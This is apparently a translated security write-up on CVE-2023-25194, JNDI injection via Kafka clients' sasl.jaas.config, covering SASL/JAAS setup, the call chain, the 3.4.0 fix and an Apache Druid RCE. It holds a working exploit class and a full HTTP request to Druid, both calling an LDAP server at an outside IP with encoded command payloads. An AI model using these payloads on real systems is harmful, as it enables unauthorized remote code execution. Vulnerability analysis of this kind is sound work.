CVE-2023-25194 Kafka JNDI injection analysis

Apache Kafka Clients JNDI Injection

Vulnerability description

Apache Kafka is a distributed data-stream processing platform that can publish, subscribe to, store, and process data streams in real time. Kafka Connect is a tool for scalable, reliable streaming of data between Kafka and other systems. An attacker who can create or modify connectors on a Kafka Connect worker can supply a crafted SASL JAAS configuration to any SASL-capable Kafka client and achieve remote code execution via JNDI injection.

Affected versions

2.4.0 <= Apache Kafka <= 3.3.2

Prerequisite knowledge

What is Kafka

Kafka is an open-source distributed messaging system. It can handle large volumes of messages and data streams with high throughput, low latency, and good scalability, and it is widely used in big-data scenarios such as log collection, data transfer, and stream processing.

It feels very similar to RocketMQ; its core function is moving data around.

Kafka client SASL JAAS configuration

Simple Authentication and Security Layer (SASL) is a framework for authentication and data security in network protocols. In Kafka it is configured through JAAS.

Java Authentication and Authorization Service (JAAS) is a user-centric security framework that complements Java's code-centric security; in short, it handles authentication. Interestingly, Shiro (formerly JSecurity) was originally developed because of the many shortcomings JAAS had at the time.

The following is adapted from https://blog.csdn.net/yinxuep/article/details/103242969; some subtle configuration details are not expanded upon here. Setting the configuration dynamically and statically modifying a .conf file have the same effect.

Server configuration

1. The server-side JAAS file is usually configured on the broker node. For example, name it kafka_server_jaas.conf, with the following content:

KafkaServer {
    org.apache.kafka.common.security.plain.PlainLoginModule required
    username="eystar"
    password="eystar8888"
    user_eystar="eystar8888"
    user_yxp="yxp-secret";
};

Description:

username and password are the credentials used for authentication between brokers in the Kafka cluster.

user_eystar="eystar8888" defines user information for clients connecting to the broker, i.e. it creates an identity with username eystar and password eystar8888 that the broker authenticates. Multiple users can be created, in the format user_XXX="XXX".

2. If used statically, it needs to be added to the JVM startup parameters, for example:

if [ -z "$KAFKA_OPTS" ]; then
    export KAFKA_OPTS="-Djava.security.auth.login.config=/opt/modules/kafka_2.11-2.0.0/config/kafka_server_jaas.conf"
fi

https://kafka.apache.org/documentation/#brokerconfigs_sasl.jaas.config
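
Besides the static JAAS file, the broker also accepts the JAAS configuration as a per-listener property (documented at the link above). A sketch of the equivalent broker setting, assuming the same PLAIN listener and users as in the example file:

# Per-listener equivalent of kafka_server_jaas.conf (sketch; listener and
# mechanism names follow the listener.name.{listener}.{mechanism} convention)
listener.name.sasl_plaintext.plain.sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \
    username="eystar" \
    password="eystar8888" \
    user_eystar="eystar8888";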

Client configuration

The client is configured in much the same way as the server; the steps are as follows.

1. Configure the client JAAS file, named kafka_client_jaas.conf:

KafkaClient {
        org.apache.kafka.common.security.plain.PlainLoginModule required
        username="eystar"
        password="eystar8888";
};

2. When calling the Kafka client from Java, specify the sasl.jaas.config configuration property:

sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \
    username="eystar" \
    password="eystar8888";

// That is, as a configuration property (it can also be set dynamically,
// covered below, which is reminiscent of RocketMQ):
props.setProperty("sasl.jaas.config",
        "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"eystar\" password=\"eystar8888\";");

Dynamically modifying the Kafka client JAAS configuration

Method 1: Configure it as a Properties attribute. Note that the key of this field is sasl.jaas.config, and its value has the following format:

loginModuleClass controlFlag (optionName=optionValue)*;

The loginModuleClass identifies the authentication mechanism, such as LDAP, Kerberos, or Unix authentication; see the official documentation at https://docs.oracle.com/javase/8/docs/technotes/guides/security/jgss/tutorials/LoginConfigFile.html. One of these is JndiLoginModule, and the JDK's built-in login modules live under com.sun.security.auth.module.

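Nothing in this grammar restricts which login module a client may name; the JDK's JndiLoginModule fits it just as well (the value below is purely illustrative; its security impact is covered later):

// Any login module on the classpath matches the same grammar, e.g. the
// JDK's JndiLoginModule with its user.provider.url option (illustration only):
String jaas = "com.sun.security.auth.module.JndiLoginModule required "
        + "user.provider.url=\"ldap://127.0.0.1:1389/obj\";";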

// Safe mode: username and password
props.setProperty("sasl.jaas.config",
        "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
props.setProperty("security.protocol", "SASL_PLAINTEXT");
props.setProperty("sasl.mechanism", "PLAIN");

Method 2: Set system property parameters

// Specify the kafka_client_jaas.conf file path
String confPath = TestKafkaComsumer.class.getResource("/").getPath() + "/kafka_client_jaas.conf";
System.setProperty("java.security.auth.login.config", confPath);

Implementation code

Consumer

import org.apache.kafka.clients.consumer.ConsumerRecord;
import org.apache.kafka.clients.consumer.ConsumerRecords;
import org.apache.kafka.clients.consumer.KafkaConsumer;

import java.time.Duration;
import java.util.Arrays;
import java.util.Properties;

public class TestComsumer {

    public static void main(String[] args) {

        Properties props = new Properties();
        props.put("bootstrap.servers", "192.168.1.176:9092");
        props.put("group.id", "test_group");
        props.put("enable.auto.commit", "true");
        props.put("auto.commit.interval.ms", "1000");
        props.put("key.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("value.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");
        // sasl.jaas.config configuration
        props.setProperty("sasl.jaas.config",
                "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        props.setProperty("sasl.mechanism", "PLAIN");

        KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);
        consumer.subscribe(Arrays.asList("topic_name"));
        while (true) {
            try {
                ConsumerRecords<String, String> records = consumer.poll(Duration.ofMillis(100));
                for (ConsumerRecord<String, String> record : records)
                    System.out.printf("offset = %d, partition = %d, key = %s, value = %s%n",
                            record.offset(), record.partition(), record.key(), record.value());
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }

}

Producer

import org.apache.kafka.clients.producer.KafkaProducer;
import org.apache.kafka.clients.producer.Producer;
import org.apache.kafka.clients.producer.ProducerRecord;

import java.util.Properties;

public class TestProduce {

    public static void main(String[] args) {

        Properties props = new Properties();

        props.put("bootstrap.servers", "192.168.1.176:9092");
        props.put("acks", "1");
        props.put("retries", 3);
        props.put("batch.size", 16384);
        props.put("buffer.memory", 33554432);
        props.put("linger.ms", 10);
        props.put("key.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");

        // sasl
        props.setProperty("sasl.jaas.config",
                "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        props.setProperty("sasl.mechanism", "PLAIN");

        Producer<String, String> producer = new KafkaProducer<>(props);

        /**
         * ProducerRecord parameters: the first is the topic name; the second
         * is the key, which in enterprise applications is generally a business
         * ID such as an order ID or user ID; the third is the message payload.
         */

        try {
            producer.send(new ProducerRecord<String, String>("topic_name", "businessId", "message info"));
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            producer.close();
        }
    }

}

Vulnerability Reproduction

The trigger point of the vulnerability is the com.sun.security.auth.module.JndiLoginModule#attemptAuthentication method.

[Figure: lookup.png]
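
The sink is the classic JNDI one. A minimal standalone sketch of the same effect (this is not the JDK source, just the pattern attemptAuthentication ends up executing; the URL is a hypothetical attacker-run LDAP server):

import javax.naming.InitialContext;

public class JndiSinkDemo {
    public static void main(String[] args) throws Exception {
        // user.provider.url is attacker-controlled in the vulnerable setup;
        // the URL below stands in for an attacker-run LDAP server.
        String userProviderUrl = "ldap://127.0.0.1:1389/Basic/Command/Base64/Q2FsYw==";
        // InitialContext.lookup() on an attacker URL is the JNDI injection sink.
        new InitialContext().lookup(userProviderUrl);
    }
}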

With the logic straightened out, it is easy to construct an exploit (the Base64 Q2FsYw== below decodes to Calc, so a successful injection pops a calculator):

import org.apache.kafka.clients.consumer.KafkaConsumer;

import java.util.Properties;

public class EXP {
    public static void main(String[] args) throws Exception {
        Properties properties = new Properties();
        properties.put("bootstrap.servers", "127.0.0.1:1234");
        properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        properties.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");

        properties.put("sasl.mechanism", "PLAIN");
        properties.put("security.protocol", "SASL_SSL");
        properties.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " +
                "required " +
                "user.provider.url=\"ldap://124.222.21.138:1389/Basic/Command/Base64/Q2FsYw==\" " +
                "useFirstPass=\"true\" " +
                "group.provider.url=\"xxx\";");

        // The JNDI lookup fires while the consumer is being constructed,
        // so bootstrap.servers never needs to be reachable.
        KafkaConsumer<String, String> kafkaConsumer = new KafkaConsumer<>(properties);
        kafkaConsumer.close();
    }
}


Vulnerability Analysis

There is a lot of data processing and assignment up front, so we skip ahead to line 177 of org.apache.kafka.clients.consumer.KafkaConsumer, the call to ClientUtils.createChannelBuilder(), and follow it.

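Paraphrased (simplified from the kafka-clients 3.3.x sources, not a verbatim excerpt), createChannelBuilder() reads the security protocol and SASL mechanism from the config and hands off to ChannelBuilders.clientChannelBuilder():

// Paraphrase of ClientUtils.createChannelBuilder (kafka-clients 3.3.x, simplified):
SecurityProtocol securityProtocol = SecurityProtocol.forName(
        config.getString(CommonClientConfigs.SECURITY_PROTOCOL_CONFIG));
String clientSaslMechanism = config.getString(SaslConfigs.SASL_MECHANISM);
return ChannelBuilders.clientChannelBuilder(securityProtocol, JaasContext.Type.CLIENT,
        config, null, clientSaslMechanism, time, true, logContext);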

Following on, the code first checks whether a SASL protocol is in use; only if it is does execution proceed to the create() method.

[Figure: SASL_SSL.png]

Follow the create() method: after validating the client mode and the security protocol, it calls loadClientContext(), which loads further configuration.


Stepping back out, follow ((ChannelBuilder) channelBuilder).configure(configs), which eventually reaches the constructor of org.apache.kafka.common.security.authenticator.LoginManager.

[Figure: LoginManager.png]

Follow the login() method: a new LoginContext() is created and then its login() method is invoked; follow that call.


The initialize() method of JndiLoginModule will be called here.


After initialization completes, the login() method of JndiLoginModule is called, which in turn calls its attemptAuthentication() method, completing the JNDI injection.

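To summarize, the full chain from constructor to sink (paraphrased; method names as in kafka-clients 3.3.x):

// KafkaConsumer(config)
//  -> ClientUtils.createChannelBuilder(...)
//   -> ChannelBuilders.clientChannelBuilder(...)    // requires SASL_PLAINTEXT/SASL_SSL
//    -> ChannelBuilders.create(...)
//     -> JaasContext.loadClientContext(configs)     // parses sasl.jaas.config
//     -> channelBuilder.configure(configs)
//      -> LoginManager.acquireLoginManager(...)
//       -> new LoginManager(...) -> login()
//        -> LoginContext.login()
//         -> JndiLoginModule.initialize(...) / login()
//          -> attemptAuthentication(...)
//           -> InitialContext.lookup(user.provider.url)   // JNDI injection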

Bug fix

In version 3.4.0, the official fix adds a blacklist of disallowed login modules, which by default contains JndiLoginModule:

org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed

private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {
    Set<String> disallowedLoginModuleList = Arrays.stream(
            System.getProperty("org.apache.kafka.disallowed.login.modules",
                    "com.sun.security.auth.module.JndiLoginModule").split(","))
            .map(String::trim)
            .collect(Collectors.toSet());
    String loginModuleName = appConfigurationEntry.getLoginModuleName().trim();
    if (disallowedLoginModuleList.contains(loginModuleName)) {
        throw new IllegalArgumentException(loginModuleName + " is not allowed. Update System property '"
                + "org.apache.kafka.disallowed.login.modules" + "' to allow " + loginModuleName);
    }
}
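
Since the blacklist is driven by a system property, operators can extend it themselves; a sketch (the extra module here is just an example):

// Disallow an additional login module on top of the default JndiLoginModule:
System.setProperty("org.apache.kafka.disallowed.login.modules",
        "com.sun.security.auth.module.JndiLoginModule,com.sun.security.auth.module.LdapLoginModule");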

Apache Druid RCE via Kafka Clients

Affected versions: Apache Druid <= 25.0.0

Apache Druid is a real-time analytics database that supports ingesting data from Kafka (as a consumer). The latest version at the time, Apache Druid 25.0.0, still shipped kafka-clients 3.3.1, i.e. a vulnerable version, so given unauthorized access to a target Druid instance (the default configuration has no authentication), RCE can be achieved this way.

Interestingly, Druid bundles the commons-beanutils:1.9.4 dependency, so even on a newer JDK (where remote class loading via JNDI is disabled), the payload can be delivered as a serialized gadget chain over LDAP JNDI to achieve RCE.

  • Trigger point in the UI: Druid Web Console – Load data – Apache Kafka

Kafka data can be loaded here, and the configuration item sasl.jaas.config can be modified to deliver the payload (the Base64 aWQgPiAvdG1wL3N1Y2Nlc3M= in the request below decodes to id > /tmp/success):

POST http://124.222.21.138:8888/druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 124.222.21.138:8888
Content-Length: 916
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43
Content-Type: application/json
Origin: http://124.222.21.138:8888
Referer: http://124.222.21.138:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ja;q=0.5,zh-TW;q=0.4, no;q=0.3,ko;q=0.2
Connection: close

{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1 :1234",
"sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=" useFirstPass ="true" serviceName="x" debug="true" group.provider.url="xxx";"
},"topic":"123","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\s\S]*)","listDelimiter" :"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!! !_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{" type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}


The instantiation of KafkaConsumer can be seen in the druid-kafka-indexing-service extension.


The addConsumerPropertiesFromConfig() call there is what dynamically applies the attacker-supplied consumer configuration.
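
Paraphrased (a simplification, not the verbatim Druid source), the method copies the user-supplied consumerProperties map into the Properties object later handed to new KafkaConsumer(...), which is how the malicious sasl.jaas.config reaches the vulnerable client:

// Simplified paraphrase of KafkaRecordSupplier.addConsumerPropertiesFromConfig
// (the real method also handles dynamic config providers):
for (Map.Entry<String, Object> entry : consumerProperties.entrySet()) {
    properties.setProperty(entry.getKey(), String.valueOf(entry.getValue()));
}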

Apache Druid 26.0.0 upgrades the kafka-clients dependency to a fixed version:

https://github.com/apache/druid/blob/26.0.0/pom.xml#L79